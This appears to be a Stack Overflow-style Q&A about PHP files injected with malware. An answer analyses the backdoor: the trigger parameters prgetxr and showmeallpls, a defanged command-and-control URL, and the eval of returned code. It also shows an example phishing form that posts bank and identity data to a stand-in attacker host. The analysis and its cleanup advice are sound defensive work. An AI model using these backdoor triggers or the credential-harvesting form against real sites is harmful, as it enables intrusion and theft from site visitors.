hackers have added content to my PHP files [closed]

Question

My website has been taken down by hackers, and looking through the site there is a load of additional stuff at the top of each PHP file.

Each file now starts with:

GLOBAL $wehaveitagain;
if($wehaveitagain != 1)
{

Full addition here

The database seems to be fine, so I am curious, what is the likely path of entry to be able to edit my files?

Answer 1

You're not the first to get hit by airschk

The exploit is based around a POST request with a variable prgetxr being set.

If it isn't set (and likely, in normal use of the site, it won't be) it it cycles through that IP hash-map mynetsxx and if it finds that the requesting IP is in the network that matches this (to understand "network" you have to understand how networking works, but these are basically local guys, not remote), and if it is, it calls rewrioutclbkxxx. You can manually request that function call by sending a GET request where a GET variable showmeallpls is true.

rewrioutclbkxxx is passed through output-buffer start, so it's likely going to screw with all the data BEFORE it's sent, but AFTER your normal code is done doing it's thing.

BEWARE, LIKELY A MALICIOUS DOMAIN BELOW DON'T GO UNLESS YOU KNOW WHAT YOU'RE DOING.

It's going to pull data from hxxp://airschk.com/clk (I've censored the HTTP in that URL), it wants to get a bunch of data, so it sends a string that contains: user-agent (ie, the user's browser), their IP address, what URL they've requested, what page they came from, and the ID code 4dae82ac67843a194c000ca1 which is likely something they've set up to identify your server.

So in short, the code sends a whole whack of user information off to airschk, and it returns some data. That data gets tossed into an EVAL. Boom, your site is pwn'd.

EVAL will evaluate any string in there as if it's php. They can delete everything, edit everything, change anything they want, perhaps even get shell access. You're basically pwnt.

Now wait, what if we did send that POST request way back there? Oh sneaky, they've gone to a URL at toolbarqueries.google.com, but the URL tries to jack up google page rank for the URL (Blackhat SEO, you can get banned from google for this, but in the short-term they get more hits).

So to recap, how this attack works

1. A bunch of your user data is being sent to the criminals at airschk.
2. They're sending back whatever the hell they want, and it has nearly unlimited power to screw you (and it's customized to each user if they want)
3. They try to boost your google rank in ways that get you prerma-banned from google.
4. Back doors to check are Post requests of prgetxr and GET requests of showmeallpls.

Example of what they might do

Since they can edit the output stream of your files on-demand and know the user-agent as well as IP address they probably can track your users. Lets say you're a bank, and this is your login HTML:

<form method="post" action="./login.php">
    <input name="BankAccountNumber" />
    <input name="Password" />
</form>

Okay, the output-buffer rewrite can actually keep everything exactly the way it is and do this to your users:

<p>We have noticed high activity on your account, please provide additional information to help secure your account.</p>
<form method="post" action="http://example.com/hax/lulz">
    <input name="CreditCardNumber" />
    <input name="SocialSecurityNumber" />
    <input name="FullName" />
    <input name="DateOfBirth" />
    <input name="HomeAddress" />

    <input name="BankAccountNumber" />
    <input name="Password" />
    <input name="prgetxr" />
</form>

How to prevent this.

Well, I'd say your whole server is never to be trusted again. Nuke the damn thing from orbit and re-install a backup.

Don't have a backup? What's wrong with you? Put a backup in place after you've hired someone to comb through every line of code, every database record, and every last file installed on your system because more exploits could be anywhere. Nuke the damn thing and install a backup.

Next, set chmod settings so these files cannot be edited by anyone other than an account that is NOT the web-account. You need to understand unix security.

Next, remove that damn eval from any file that runs on your server (maybe even configure suhosin). If you have any running code that depends on it, you're doing it wrong anyway. Remove it. You need to.

A band-aid measure will be to block the hacker domain, but this is totally worthless past 12 hours, they can just move elsewhere, and likely have by now.

I can't tell about the path of attack they took to do this, so that's a whole different investigation and not really a question for SO.

Lastly, hire someone who's a trained security expert.

Security isn't trivial or easy or quick to learn. Don't play games, pay someone who knows what they're doing.

Answer 2

I do not know but the best way to find out is to see what ports are open on your machine. The web site that I use frequently to test firewalls etc is http://www.auditmypc.com/firewall-test.asp as it gives you a perspective from the outside world.